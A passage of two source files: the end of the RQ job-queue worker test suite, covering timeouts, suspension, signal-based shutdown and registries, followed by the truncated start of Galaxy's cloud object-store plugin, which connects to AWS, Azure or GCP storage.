leftover from a previous test run os.remove(SENTINEL_FILE) except OSError as e: if e.errno != 2: raise q = Queue() job = q.enqueue(create_file, SENTINEL_FILE) # Here, we cancel the job, so the sentinel file may not be created self.testconn.delete(job.key) w = Worker([q]) w.work(burst=True) assert q.count == 0 # Should not have created evidence of execution self.assertEqual(os.path.exists(SENTINEL_FILE), False) @slow # noqa def test_timeouts(self): """Worker kills jobs after timeout.""" sentinel_file = '/tmp/.rq_sentinel' q = Queue() w = Worker([q]) # Put it on the queue with a timeout value res = q.enqueue(create_file_after_timeout, args=(sentinel_file, 4), job_timeout=1) try: os.unlink(sentinel_file) except OSError as e: if e.errno == 2: pass self.assertEqual(os.path.exists(sentinel_file), False) w.work(burst=True) self.assertEqual(os.path.exists(sentinel_file), False) # TODO: Having to do the manual refresh() here is really ugly! res.refresh() self.assertIn('JobTimeoutException', as_text(res.exc_info)) def test_worker_sets_result_ttl(self): """Ensure that Worker properly sets result_ttl for individual jobs.""" q = Queue() job = q.enqueue(say_hello, args=('Frank',), result_ttl=10) w = Worker([q]) self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) w.work(burst=True) self.assertNotEqual(self.testconn.ttl(job.key), 0) self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) # Job with -1 result_ttl don't expire job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1) w = Worker([q]) self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) w.work(burst=True) self.assertEqual(self.testconn.ttl(job.key), -1) self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) # Job with result_ttl = 0 gets deleted immediately job = q.enqueue(say_hello, args=('Frank',), result_ttl=0) w = Worker([q]) self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) w.work(burst=True) self.assertEqual(self.testconn.get(job.key), None) self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1)) def test_worker_sets_job_status(self): """Ensure that worker correctly sets job status.""" q = Queue() w = Worker([q]) job = q.enqueue(say_hello) self.assertEqual(job.get_status(), JobStatus.QUEUED) self.assertEqual(job.is_queued, True) self.assertEqual(job.is_finished, False) self.assertEqual(job.is_failed, False) w.work(burst=True) job = Job.fetch(job.id) self.assertEqual(job.get_status(), JobStatus.FINISHED) self.assertEqual(job.is_queued, False) self.assertEqual(job.is_finished, True) self.assertEqual(job.is_failed, False) # Failed jobs should set status to "failed" job = q.enqueue(div_by_zero, args=(1,)) w.work(burst=True) job = Job.fetch(job.id) self.assertEqual(job.get_status(), JobStatus.FAILED) self.assertEqual(job.is_queued, False) self.assertEqual(job.is_finished, False) self.assertEqual(job.is_failed, True) def test_job_dependency(self): """Enqueue dependent jobs only if their parents don't fail""" q = Queue() w = Worker([q]) parent_job = q.enqueue(say_hello, result_ttl=0) job = q.enqueue_call(say_hello, depends_on=parent_job) w.work(burst=True) job = Job.fetch(job.id) self.assertEqual(job.get_status(), JobStatus.FINISHED) parent_job = q.enqueue(div_by_zero) job = q.enqueue_call(say_hello, depends_on=parent_job) w.work(burst=True) job = Job.fetch(job.id) self.assertNotEqual(job.get_status(), JobStatus.FINISHED) def test_get_current_job(self): """Ensure worker.get_current_job() works properly""" q = Queue() 
worker = Worker([q]) job = q.enqueue_call(say_hello) self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None) worker.set_current_job_id(job.id) self.assertEqual( worker.get_current_job_id(), as_text(self.testconn.hget(worker.key, 'current_job')) ) self.assertEqual(worker.get_current_job(), job) def test_custom_job_class(self): """Ensure Worker accepts custom job class.""" q = Queue() worker = Worker([q], job_class=CustomJob) self.assertEqual(worker.job_class, CustomJob) def test_custom_queue_class(self): """Ensure Worker accepts custom queue class.""" q = CustomQueue() worker = Worker([q], queue_class=CustomQueue) self.assertEqual(worker.queue_class, CustomQueue) def test_custom_queue_class_is_not_global(self): """Ensure Worker custom queue class is not global.""" q = CustomQueue() worker_custom = Worker([q], queue_class=CustomQueue) q_generic = Queue() worker_generic = Worker([q_generic]) self.assertEqual(worker_custom.queue_class, CustomQueue) self.assertEqual(worker_generic.queue_class, Queue) self.assertEqual(Worker.queue_class, Queue) def test_custom_job_class_is_not_global(self): """Ensure Worker custom job class is not global.""" q = Queue() worker_custom = Worker([q], job_class=CustomJob) q_generic = Queue() worker_generic = Worker([q_generic]) self.assertEqual(worker_custom.job_class, CustomJob) self.assertEqual(worker_generic.job_class, Job) self.assertEqual(Worker.job_class, Job) def test_work_via_simpleworker(self): """Worker processes work, with forking disabled, then returns.""" fooq, barq = Queue('foo'), Queue('bar') w = SimpleWorker([fooq, barq]) self.assertEqual(w.work(burst=True), False, 'Did not expect any work on the queue.') job = fooq.enqueue(say_pid) self.assertEqual(w.work(burst=True), True, 'Expected at least some work done.') self.assertEqual(job.result, os.getpid(), 'PID mismatch, fork() is not supposed to happen here') def test_simpleworker_heartbeat_ttl(self): """SimpleWorker's key must last longer than job.timeout when working""" queue = Queue('foo') worker = SimpleWorker([queue]) job_timeout = 300 job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout) worker.work(burst=True) job.refresh() self.assertGreater(job.meta['ttl'], job_timeout) def test_prepare_job_execution(self): """Prepare job execution does the necessary bookkeeping.""" queue = Queue(connection=self.testconn) job = queue.enqueue(say_hello) worker = Worker([queue]) worker.prepare_job_execution(job) # Updates working queue registry = StartedJobRegistry(connection=self.testconn) self.assertEqual(registry.get_job_ids(), [job.id]) # Updates worker statuses self.assertEqual(worker.get_state(), 'busy') self.assertEqual(worker.get_current_job_id(), job.id) # job status is also updated self.assertEqual(job._status, JobStatus.STARTED) self.assertEqual(job.worker_name, worker.name) def test_work_unicode_friendly(self): """Worker processes work with unicode description, then quits.""" q = Queue('foo') w = Worker([q]) job = q.enqueue('tests.fixtures.say_hello', name='Adam', description='你好 世界!') self.assertEqual(w.work(burst=True), True, 'Expected at least some work done.') self.assertEqual(job.result, 'Hi there, Adam!') self.assertEqual(job.description, '你好 世界!') def test_work_log_unicode_friendly(self): """Worker process work with unicode or str other than pure ascii content, logging work properly""" q = Queue("foo") w = Worker([q]) job = q.enqueue('tests.fixtures.say_hello', name='阿达姆', description='你好 世界!') w.work(burst=True) self.assertEqual(job.get_status(), 
JobStatus.FINISHED) job = q.enqueue('tests.fixtures.say_hello_unicode', name='阿达姆', description='你好 世界!') w.work(burst=True) self.assertEqual(job.get_status(), JobStatus.FINISHED) def test_suspend_worker_execution(self): """Test Pause Worker Execution""" SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa try: # Remove the sentinel if it is leftover from a previous test run os.remove(SENTINEL_FILE) except OSError as e: if e.errno != 2: raise q = Queue() q.enqueue(create_file, SENTINEL_FILE) w = Worker([q]) suspend(self.testconn) w.work(burst=True) assert q.count == 1 # Should not have created evidence of execution self.assertEqual(os.path.exists(SENTINEL_FILE), False) resume(self.testconn) w.work(burst=True) assert q.count == 0 self.assertEqual(os.path.exists(SENTINEL_FILE), True) @slow def test_suspend_with_duration(self): q = Queue() for _ in range(5): q.enqueue(do_nothing) w = Worker([q]) # This suspends workers for working for 2 second suspend(self.testconn, 2) # So when this burst of work happens the queue should remain at 5 w.work(burst=True) assert q.count == 5 sleep(3) # The suspension should be expired now, and a burst of work should now clear the queue w.work(burst=True) assert q.count == 0 def test_worker_hash_(self): """Workers are hashed by their .name attribute""" q = Queue('foo') w1 = Worker([q], name="worker1") w2 = Worker([q], name="worker2") w3 = Worker([q], name="worker1") worker_set = set([w1, w2, w3]) self.assertEqual(len(worker_set), 2) def test_worker_sets_birth(self): """Ensure worker correctly sets worker birth date.""" q = Queue() w = Worker([q]) w.register_birth() birth_date = w.birth_date self.assertIsNotNone(birth_date) self.assertEqual(type(birth_date).__name__, 'datetime') def test_worker_sets_death(self): """Ensure worker correctly sets worker death date.""" q = Queue() w = Worker([q]) w.register_death() death_date = w.death_date self.assertIsNotNone(death_date) self.assertIsInstance(death_date, datetime) def test_clean_queue_registries(self): """worker.clean_registries sets last_cleaned_at and cleans registries.""" foo_queue = Queue('foo', connection=self.testconn) foo_registry = StartedJobRegistry('foo', connection=self.testconn) self.testconn.zadd(foo_registry.key, {'foo': 1}) self.assertEqual(self.testconn.zcard(foo_registry.key), 1) bar_queue = Queue('bar', connection=self.testconn) bar_registry = StartedJobRegistry('bar', connection=self.testconn) self.testconn.zadd(bar_registry.key, {'bar': 1}) self.assertEqual(self.testconn.zcard(bar_registry.key), 1) worker = Worker([foo_queue, bar_queue]) self.assertEqual(worker.last_cleaned_at, None) worker.clean_registries() self.assertNotEqual(worker.last_cleaned_at, None) self.assertEqual(self.testconn.zcard(foo_registry.key), 0) self.assertEqual(self.testconn.zcard(bar_registry.key), 0) # worker.clean_registries() only runs once every 15 minutes # If we add another key, calling clean_registries() should do nothing self.testconn.zadd(bar_registry.key, {'bar': 1}) worker.clean_registries() self.assertEqual(self.testconn.zcard(bar_registry.key), 1) def test_should_run_maintenance_tasks(self): """Workers should run maintenance tasks on startup and every hour.""" queue = Queue(connection=self.testconn) worker = Worker(queue) self.assertTrue(worker.should_run_maintenance_tasks) worker.last_cleaned_at = utcnow() self.assertFalse(worker.should_run_maintenance_tasks) worker.last_cleaned_at = utcnow() - timedelta(seconds=3700) self.assertTrue(worker.should_run_maintenance_tasks) def test_worker_calls_clean_registries(self): 
"""Worker calls clean_registries when run.""" queue = Queue(connection=self.testconn) registry = StartedJobRegistry(connection=self.testconn) self.testconn.zadd(registry.key, {'foo': 1}) worker = Worker(queue, connection=self.testconn) worker.work(burst=True) self.assertEqual(self.testconn.zcard(registry.key), 0) def test_job_dependency_race_condition(self): """Dependencies added while the job gets finished shouldn't get lost.""" # This patches the enqueue_dependents to enqueue a new dependency AFTER # the original code was executed. orig_enqueue_dependents = Queue.enqueue_dependents def new_enqueue_dependents(self, job, *args, **kwargs): orig_enqueue_dependents(self, job, *args, **kwargs) if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id: Queue._add_enqueue = None Queue().enqueue_call(say_hello, depends_on=job) Queue.enqueue_dependents = new_enqueue_dependents q = Queue() w = Worker([q]) with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked: parent_job = q.enqueue(say_hello, result_ttl=0) Queue._add_enqueue = parent_job job = q.enqueue_call(say_hello, depends_on=parent_job) w.work(burst=True) job = Job.fetch(job.id) self.assertEqual(job.get_status(), JobStatus.FINISHED) # The created spy checks two issues: # * before the fix of #739, 2 of the 3 jobs where executed due # to the race condition # * during the development another issue was fixed: # due to a missing pipeline usage in Queue.enqueue_job, the job # which was enqueued before the "rollback" was executed twice. # So before that fix the call count was 4 instead of 3 self.assertEqual(mocked.call_count, 3) def test_self_modification_persistence(self): """Make sure that any meta modification done by the job itself persists completely through the queue/worker/job stack.""" q = Queue() # Also make sure that previously existing metadata # persists properly job = q.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42}, args=[{'baz': 10, 'newinfo': 'waka'}]) w = Worker([q]) w.work(burst=True) job_check = Job.fetch(job.id) self.assertEqual(job_check.meta['foo'], 'bar') self.assertEqual(job_check.meta['baz'], 10) self.assertEqual(job_check.meta['newinfo'], 'waka') def test_self_modification_persistence_with_error(self): """Make sure that any meta modification done by the job itself persists completely through the queue/worker/job stack -- even if the job errored""" q = Queue() # Also make sure that previously existing metadata # persists properly job = q.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42}, args=[{'baz': 10, 'newinfo': 'waka'}]) w = Worker([q]) w.work(burst=True) # Postconditions self.assertEqual(q.count, 0) failed_job_registry = FailedJobRegistry(queue=q) self.assertTrue(job in failed_job_registry) self.assertEqual(w.get_current_job_id(), None) job_check = Job.fetch(job.id) self.assertEqual(job_check.meta['foo'], 'bar') self.assertEqual(job_check.meta['baz'], 10) self.assertEqual(job_check.meta['newinfo'], 'waka') @mock.patch('rq.worker.logger.info') def test_log_result_lifespan_true(self, mock_logger_info): """Check that log_result_lifespan True causes job lifespan to be logged.""" q = Queue() w = Worker([q]) job = q.enqueue(say_hello, args=('Frank',), result_ttl=10) w.perform_job(job, q) mock_logger_info.assert_called_with('Result is kept for %s seconds', 10) self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list]) @mock.patch('rq.worker.logger.info') def test_log_result_lifespan_false(self, 
mock_logger_info): """Check that log_result_lifespan False causes job lifespan to not be logged.""" q = Queue() class TestWorker(Worker): log_result_lifespan = False w = TestWorker([q]) job = q.enqueue(say_hello, args=('Frank',), result_ttl=10) w.perform_job(job, q) self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list]) @mock.patch('rq.worker.logger.info') def test_log_job_description_true(self, mock_logger_info): """Check that log_job_description True causes job lifespan to be logged.""" q = Queue() w = Worker([q]) q.enqueue(say_hello, args=('Frank',), result_ttl=10) w.dequeue_job_and_maintain_ttl(10) self.assertIn("Frank", mock_logger_info.call_args[0][2]) @mock.patch('rq.worker.logger.info') def test_log_job_description_false(self, mock_logger_info): """Check that log_job_description False causes job lifespan to not be logged.""" q = Queue() w = Worker([q], log_job_description=False) q.enqueue(say_hello, args=('Frank',), result_ttl=10) w.dequeue_job_and_maintain_ttl(10) self.assertNotIn("Frank", mock_logger_info.call_args[0][2]) def test_worker_version(self): q = Queue() w = Worker([q]) w.version = '0.0.0' w.register_birth() self.assertEqual(w.version, '0.0.0') w.refresh() self.assertEqual(w.version, '0.0.0') # making sure that version is preserved when worker is retrieved by key worker = Worker.find_by_key(w.key) self.assertEqual(worker.version, '0.0.0') def test_python_version(self): python_version = sys.version q = Queue() w = Worker([q]) w.register_birth() self.assertEqual(w.python_version, python_version) # now patching version python_version = 'X.Y.Z.final' # dummy version self.assertNotEqual(python_version, sys.version) # otherwise tests are pointless w2 = Worker([q]) w2.python_version = python_version w2.register_birth() self.assertEqual(w2.python_version, python_version) # making sure that version is preserved when worker is retrieved by key worker = Worker.find_by_key(w2.key) self.assertEqual(worker.python_version, python_version) def wait_and_kill_work_horse(pid, time_to_wait=0.0): time.sleep(time_to_wait) os.kill(pid, signal.SIGKILL) class TimeoutTestCase: def setUp(self): # we want tests to fail if signal are ignored and the work remain # running, so set a signal to kill them after X seconds self.killtimeout = 15 signal.signal(signal.SIGALRM, self._timeout) signal.alarm(self.killtimeout) def _timeout(self, signal, frame): raise AssertionError( "test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout ) class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase): @slow def test_idle_worker_warm_shutdown(self): """worker with no ongoing job receiving single SIGTERM signal and shutting down""" w = Worker('foo') self.assertFalse(w._stop_requested) p = Process(target=kill_worker, args=(os.getpid(), False)) p.start() w.work() p.join(1) self.assertFalse(w._stop_requested) @slow def test_working_worker_warm_shutdown(self): """worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down""" fooq = Queue('foo') w = Worker(fooq) sentinel_file = '/tmp/.rq_sentinel_warm' fooq.enqueue(create_file_after_timeout, sentinel_file, 2) self.assertFalse(w._stop_requested) p = Process(target=kill_worker, args=(os.getpid(), False)) p.start() w.work() p.join(2) self.assertFalse(p.is_alive()) self.assertTrue(w._stop_requested) self.assertTrue(os.path.exists(sentinel_file)) self.assertIsNotNone(w.shutdown_requested_date) 
self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime') @slow def test_working_worker_cold_shutdown(self): """Busy worker shuts down immediately on double SIGTERM signal""" fooq = Queue('foo') w = Worker(fooq) sentinel_file = '/tmp/.rq_sentinel_cold' fooq.enqueue(create_file_after_timeout, sentinel_file, 2) self.assertFalse(w._stop_requested) p = Process(target=kill_worker, args=(os.getpid(), True)) p.start() self.assertRaises(SystemExit, w.work) p.join(1) self.assertTrue(w._stop_requested) self.assertFalse(os.path.exists(sentinel_file)) shutdown_requested_date = w.shutdown_requested_date self.assertIsNotNone(shutdown_requested_date) self.assertEqual(type(shutdown_requested_date).__name__, 'datetime') @slow def test_work_horse_death_sets_job_failed(self): """worker with an ongoing job whose work horse dies unexpectadly (before completing the job) should set the job's status to FAILED """ fooq = Queue('foo') self.assertEqual(fooq.count, 0) w = Worker(fooq) sentinel_file = '/tmp/.rq_sentinel_work_horse_death' if os.path.exists(sentinel_file): os.remove(sentinel_file) fooq.enqueue(create_file_after_timeout, sentinel_file, 100) job, queue = w.dequeue_job_and_maintain_ttl(5) w.fork_work_horse(job, queue) p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5)) p.start() w.monitor_work_horse(job, queue) job_status = job.get_status() p.join(1) self.assertEqual(job_status, JobStatus.FAILED) failed_job_registry = FailedJobRegistry(queue=fooq) self.assertTrue(job in failed_job_registry) self.assertEqual(fooq.count, 0) @slow def test_work_horse_force_death(self): """Simulate a frozen worker that doesn't observe the timeout properly. Fake it by artificially setting the timeout of the parent process to something much smaller after the process is already forked. 
""" fooq = Queue('foo') self.assertEqual(fooq.count, 0) w = Worker(fooq) sentinel_file = '/tmp/.rq_sentinel_work_horse_death' if os.path.exists(sentinel_file): os.remove(sentinel_file) fooq.enqueue(launch_process_within_worker_and_store_pid, sentinel_file, 100) job, queue = w.dequeue_job_and_maintain_ttl(5) w.fork_work_horse(job, queue) job.timeout = 5 w.job_monitoring_interval = 1 now = utcnow() time.sleep(1) with open(sentinel_file) as f: subprocess_pid = int(f.read().strip()) self.assertTrue(psutil.pid_exists(subprocess_pid)) w.monitor_work_horse(job, queue) fudge_factor = 1 total_time = w.job_monitoring_interval + 65 + fudge_factor self.assertTrue((utcnow() - now).total_seconds() < total_time) self.assertEqual(job.get_status(), JobStatus.FAILED) failed_job_registry = FailedJobRegistry(queue=fooq) self.assertTrue(job in failed_job_registry) self.assertEqual(fooq.count, 0) self.assertFalse(psutil.pid_exists(subprocess_pid)) def schedule_access_self(): q = Queue('default', connection=get_current_connection()) q.enqueue(access_self) @pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X') class TestWorkerSubprocess(RQTestCase): def setUp(self): super(TestWorkerSubprocess, self).setUp() db_num = self.testconn.connection_pool.connection_kwargs['db'] self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num def test_run_empty_queue(self): """Run the worker in its own process with an empty queue""" subprocess.check_call(['rqworker', '-u', self.redis_url, '-b']) def test_run_access_self(self): """Schedule a job, then run the worker as subprocess""" q = Queue() job = q.enqueue(access_self) subprocess.check_call(['rqworker', '-u', self.redis_url, '-b']) registry = FinishedJobRegistry(queue=q) self.assertTrue(job in registry) assert q.count == 0 @skipIf('pypy' in sys.version.lower(), 'often times out with pypy') def test_run_scheduled_access_self(self): """Schedule a job that schedules a job, then run the worker as subprocess""" q = Queue() job = q.enqueue(schedule_access_self) subprocess.check_call(['rqworker', '-u', self.redis_url, '-b']) registry = FinishedJobRegistry(queue=q) self.assertTrue(job in registry) assert q.count == 0 @pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals') @skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy') class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase): def setUp(self): super(HerokuWorkerShutdownTestCase, self).setUp() self.sandbox = '/tmp/rq_shutdown/' os.makedirs(self.sandbox) def tearDown(self): shutil.rmtree(self.sandbox, ignore_errors=True) @slow def test_immediate_shutdown(self): """Heroku work horse shutdown with immediate (0 second) kill""" p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0)) p.start() time.sleep(0.5) os.kill(p.pid, signal.SIGRTMIN) p.join(2) self.assertEqual(p.exitcode, 1) self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started'))) self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished'))) @slow def test_1_sec_shutdown(self): """Heroku work horse shutdown with 1 second kill""" p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1)) p.start() time.sleep(0.5) os.kill(p.pid, signal.SIGRTMIN) time.sleep(0.1) self.assertEqual(p.exitcode, None) p.join(2) self.assertEqual(p.exitcode, 1) self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started'))) self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished'))) @slow def test_shutdown_double_sigrtmin(self): """Heroku work horse shutdown with long delay but 
SIGRTMIN sent twice""" p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10)) p.start() time.sleep(0.5) os.kill(p.pid, signal.SIGRTMIN) # we have to wait a short while otherwise the second signal wont bet processed. time.sleep(0.1) os.kill(p.pid, signal.SIGRTMIN) p.join(2) self.assertEqual(p.exitcode, 1) self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started'))) self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished'))) @mock.patch('rq.worker.logger.info') def test_handle_shutdown_request(self, mock_logger_info): """Mutate HerokuWorker so _horse_pid refers to an artificial process and test handle_warm_shutdown_request""" w = HerokuWorker('foo') path = os.path.join(self.sandbox, 'shouldnt_exist') p = Process(target=create_file_after_timeout_and_setsid, args=(path, 2)) p.start() self.assertEqual(p.exitcode, None) time.sleep(0.1) w._horse_pid = p.pid w.handle_warm_shutdown_request() p.join(2) # would expect p.exitcode to be -34 self.assertEqual(p.exitcode, -34) self.assertFalse(os.path.exists(path)) mock_logger_info.assert_called_with('Killed horse pid %s', p.pid) def test_handle_shutdown_request_no_horse(self): """Mutate HerokuWorker so _horse_pid refers to non existent process and test handle_warm_shutdown_request""" w = HerokuWorker('foo') w._horse_pid = 19999 w.handle_warm_shutdown_request() class TestExceptionHandlerMessageEncoding(RQTestCase): def setUp(self): super(TestExceptionHandlerMessageEncoding, self).setUp() self.worker = Worker("foo") self.worker._exc_handlers = [] # Mimic how exception info is actually passed forwards try: raise Exception(u"💪") except Exception: self.exc_info = sys.exc_info() def test_handle_exception_handles_non_ascii_in_exception_message(self): """worker.handle_exception doesn't crash on non-ascii in exception message.""" self.worker.handle_exception(Mock(), *self.exc_info) class TestRoundRobinWorker(RQTestCase): def test_round_robin(self): qs = [Queue('q%d' % i) for i in range(5)] for i in range(5): for j in range(3): qs[i].enqueue(say_pid, job_id='q%d_%d' % (i, j)) w = RoundRobinWorker(qs) w.work(burst=True) start_times = [] for i in range(5): for j in range(3): job = Job.fetch('q%d_%d' % (i, j)) start_times.append(('q%d_%d' % (i, j), job.started_at)) sorted_by_time = sorted(start_times, key=lambda tup: tup[1]) sorted_ids = [tup[0] for tup in sorted_by_time] expected = ['q0_0', 'q1_0', 'q2_0', 'q3_0', 'q4_0', 'q0_1', 'q1_1', 'q2_1', 'q3_1', 'q4_1', 'q0_2', 'q1_2', 'q2_2', 'q3_2', 'q4_2'] self.assertEqual(expected, sorted_ids) class TestRandomWorker(RQTestCase): def test_random_worker(self): qs = [Queue('q%d' % i) for i in range(5)] for i in range(5): for j in range(3): qs[i].enqueue(say_pid, job_id='q%d_%d' % (i, j)) w = RandomWorker(qs) w.work(burst=True) start_times = [] for i in range(5): for j in range(3): job = Job.fetch('q%d_%d' % (i, j)) start_times.append(('q%d_%d' % (i, j), job.started_at)) sorted_by_time = sorted(start_times, key=lambda tup: tup[1]) sorted_ids = [tup[0] for tup in sorted_by_time] expected_rr = ['q%d_%d' % (i, j) for j in range(3) for i in range(5)] expected_ser = ['q%d_%d' % (i, j) for i in range(5) for j in range(3)] self.assertNotEqual(sorted_ids, expected_rr) self.assertNotEqual(sorted_ids, expected_ser) expected_rr.reverse() expected_ser.reverse() self.assertNotEqual(sorted_ids, expected_rr) self.assertNotEqual(sorted_ids, expected_ser) sorted_ids.sort() expected_ser.sort() self.assertEqual(sorted_ids, expected_ser)
cloud.py
""" Object Store plugin for Cloud storage. """ import logging import multiprocessing import os import os.path import shutil import subprocess import threading import time from datetime import datetime from galaxy.exceptions import ObjectInvalid, ObjectNotFound from galaxy.util import ( directory_hash_id, safe_relpath, umask_fix_perms, ) from galaxy.util.sleeper import Sleeper from .s3 import parse_config_xml from ..objectstore import ConcreteObjectStore, convert_bytes try: from cloudbridge.factory import CloudProviderFactory, ProviderList from cloudbridge.interfaces.exceptions import InvalidNameException except ImportError: CloudProviderFactory = None ProviderList = None log = logging.getLogger(__name__) NO_CLOUDBRIDGE_ERROR_MESSAGE = ( "Cloud ObjectStore is configured, but no CloudBridge dependency available." "Please install CloudBridge or modify ObjectStore configuration." ) class CloudConfigMixin: def _config_to_dict(self): return { "provider": self.provider, "auth": self.credentials, "bucket": { "name": self.bucket_name, "use_reduced_redundancy": self.use_rr, }, "connection": { "host": self.host, "port": self.port, "multipart": self.multipart, "is_secure": self.is_secure, "conn_path": self.conn_path, }, "cache": { "size": self.cache_size, "path": self.staging_path, } } class Cloud(ConcreteObjectStore, CloudConfigMixin): """ Object store that stores objects as items in an cloud storage. A local cache exists that is used as an intermediate location for files between Galaxy and the cloud storage. """ store_type = 'cloud' def __init__(self, config, config_dict): super().__init__(config, config_dict) self.transfer_progress = 0 bucket_dict = config_dict['bucket'] connection_dict = config_dict.get('connection', {}) cache_dict = config_dict['cache'] self.provider = config_dict["provider"] self.credentials = config_dict["auth"] self.bucket_name = bucket_dict.get('name') self.use_rr = bucket_dict.get('use_reduced_redundancy', False) self.max_chunk_size = bucket_dict.get('max_chunk_size', 250) self.host = connection_dict.get('host', None) self.port = connection_dict.get('port', 6000) self.multipart = connection_dict.get('multipart', True) self.is_secure = connection_dict.get('is_secure', True) self.conn_path = connection_dict.get('conn_path', '/') self.cache_size = cache_dict.get('size', -1) self.staging_path = cache_dict.get('path') or self.config.object_store_cache_path self._initialize() def _initialize(self): if CloudProviderFactory is None: raise Exception(NO_CLOUDBRIDGE_ERROR_MESSAGE) self.conn = self._get_connection(self.provider, self.credentials) self.bucket = self._get_bucket(self.bucket_name) # Clean cache only if value is set in galaxy.ini if self.cache_size != -1: # Convert GBs to bytes for comparison self.cache_size = self.cache_size * 1073741824 # Helper for interruptable sleep self.sleeper = Sleeper() self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor) self.cache_monitor_thread.start() log.info("Cache cleaner manager started") # Test if 'axel' is available for parallel download and pull the key into cache try: subprocess.call('axel') self.use_axel = True except OSError: self.use_axel = False @staticmethod def _get_connection(provider, credentials): log.debug("Configuring `{}` Connection".format(provider)) if provider == "aws": config = {"aws_access_key": credentials["access_key"], "aws_secret_key": credentials["secret_key"]} connection = CloudProviderFactory().create_provider(ProviderList.AWS, config) elif provider == "azure": config = 
{"azure_subscription_id": credentials["subscription_id"], "azure_client_id": credentials["client_id"], "azure_secret": credentials["secret"], "azure_tenant": credentials["tenant"]} connection = CloudProviderFactory().create_provider(ProviderList.AZURE, config) elif provider == "google": config = {"gcp_service_creds_file": credentials["credentials_file"]} connection = CloudProviderFactory().create_provider(ProviderList.GCP, config) else: raise Exception("Unsupported provider `{}`.".format(provider)) # Ideally it would be better to assert if the connection is # authorized to perform operations required by ObjectStore # before returning it (and initializing ObjectStore); hence # any related issues can be handled properly here, and ObjectStore # can "trust" the connection is established. # # However, the mechanism implemented in Cloudbridge to assert if # a user/service is authorized to perform an operation, assumes # the user/service is granted with an elevated privileges, such # as admin/owner-level access to all resources. For a detailed # discussion see: # # https://github.com/CloudVE/cloudbridge/issues/135 # # Hence, if a resource owner wants to only authorize Galaxy to r/w # a bucket/container on the provider, but does not allow it to access # other resources, Cloudbridge may fail asserting credentials. # For instance, to r/w an Amazon S3 bucket, the resource owner # also needs to authorize full access to Amazon EC2, because Cloudbridge # leverages EC2-specific functions to assert the credentials. # # Therefore, to adhere with principle of least privilege, we do not # assert credentials; instead, we handle exceptions raised as a # result of signing API calls to cloud provider (e.g., GCP) using # incorrect, invalid, or unauthorized credentials. return connection @classmethod def parse_xml(clazz, config_xml): # The following reads common cloud-based storage configuration # as implemented for the S3 backend. Hence, it also attempts to # parse S3-specific configuration (e.g., credentials); however, # such provider-specific configuration is overwritten in the # following. config = parse_config_xml(config_xml) try: provider = config_xml.attrib.get("provider") if provider is None: msg = "Missing `provider` attribute from the Cloud backend of the ObjectStore." log.error(msg) raise Exception(msg) provider = provider.lower() config["provider"] = provider # Read any provider-specific configuration. 
auth_element = config_xml.findall("auth")[0] missing_config = [] if provider == "aws": akey = auth_element.get("access_key") if akey is None: missing_config.append("access_key") skey = auth_element.get("secret_key") if skey is None: missing_config.append("secret_key") config["auth"] = { "access_key": akey, "secret_key": skey} elif provider == "azure": sid = auth_element.get("subscription_id") if sid is None: missing_config.append("subscription_id") cid = auth_element.get("client_id") if cid is None: missing_config.append("client_id") sec = auth_element.get("secret") if sec is None: missing_config.append("secret") ten = auth_element.get("tenant") if ten is None: missing_config.append("tenant") config["auth"] = { "subscription_id": sid, "client_id": cid, "secret": sec, "tenant": ten} elif provider == "google": cre = auth_element.get("credentials_file") if not os.path.isfile(cre): msg = "The following file specified for GCP credentials not found: {}".format(cre) log.error(msg) raise OSError(msg) if cre is None: missing_config.append("credentials_file") config["auth"] = { "credentials_file": cre} else: msg = "Unsupported provider `{}`.".format(provider) log.error(msg) raise Exception(msg) if len(missing_config) > 0: msg = "The following configuration required for {} cloud backend " \ "are missing: {}".format(provider, missing_config) log.error(msg) raise Exception(msg) else: return config except Exception: log.exception("Malformed ObjectStore Configuration XML -- unable to continue") raise def to_dict(self): as_dict = super().to_dict() as_dict.update(self._config_to_dict()) return as_dict def __cache_monitor(self): time.sleep(2) # Wait for things to load before starting the monitor while self.running: total_size = 0 # Is this going to be too expensive of an operation to be done frequently? file_list = [] for dirpath, _, filenames in os.walk(self.staging_path): for filename in filenames: filepath = os.path.join(dirpath, filename) file_size = os.path.getsize(filepath) total_size += file_size # Get the time given file was last accessed last_access_time = time.localtime(os.stat(filepath)[7]) # Compose a tuple of the access time and the file path file_tuple = last_access_time, filepath, file_size file_list.append(file_tuple) # Sort the file list (based on access time) file_list.sort() # Initiate 